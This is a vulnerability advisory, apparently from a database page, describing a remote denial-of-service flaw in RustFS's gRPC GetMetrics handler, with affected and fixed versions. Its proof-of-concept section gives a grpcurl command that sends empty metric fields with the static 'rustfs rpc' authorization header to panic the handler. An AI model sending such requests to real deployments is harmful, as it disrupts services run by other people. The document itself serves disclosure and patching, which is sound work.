Описание
RustFS gRPC GetMetrics deserialization panic enables remote DoS
Summary
A malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint.
Details
- Vulnerable code:
rustfs/src/storage/tonic_service.rs:1775-1782:MetricTypeandCollectMetricsOptsare deserialized withDeserialize::deserialize(...).unwrap()from client-supplied bytes.- Malformed
metric_type/opts(e.g., empty or truncated rmp-serde payloads) triggerInvalidMarkerReadand panic.
- Reachability: same TCP listener as S3 (default
:9000); only a static interceptor tokenauthorization: rustfs rpcis checked inserver/http.rs:677. - Impact scope: panic terminates the worker handling the request, causing metrics service interruption and potential process instability.
PoC
rustfs-grpc-metrics-invalid-metric-type-panic-poc.tar.gz
- Start RustFS (example local dev):
mkdir -p /tmp/rustfs-data1 /tmp/rustfs-data2
RUSTFS_ACCESS_KEY=devadmin RUSTFS_SECRET_KEY=devadmin \
cargo run --bin rustfs -- --address 0.0.0.0:9000 \
/tmp/rustfs-data1 /tmp/rustfs-data2
- From
rustfs-grpc-metrics-invalid-metric-type-panic-poc/, run:
ENDPOINT=127.0.0.1:9000 make run
# or: grpcurl -plaintext \
# -H 'authorization: rustfs rpc' \
# -import-path ../crates/protos/src -proto node.proto \
# -d '{"metric_type":"","opts":""}' \
# 127.0.0.1:9000 node_service.NodeService/GetMetrics
- Observe panic in server logs at
tonic_service.rs:get_metricswithInvalidMarkerReadand worker crash; client output saved topoc-response.txt/poc-grpcurl.log.
Impact
- Vulnerability type: remote unauthenticated (static token) denial of service via panic in gRPC handler.
- Who is impacted: any deployment exposing the gRPC endpoint where an attacker can reach port 9000 and supply the known
authorization: rustfs rpcheader; metrics service is disrupted and may affect overall stability depending on runtime crash handling.
Пакеты
Наименование
rustfs
rust
Затронутые версииВерсия исправления
>= 1.0.0-alpha.13, <= 1.0.0-alpha.77
1.0.0-alpha.78
Связанные уязвимости
CVSS3: 4
nvd
около 1 месяца назад
RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78.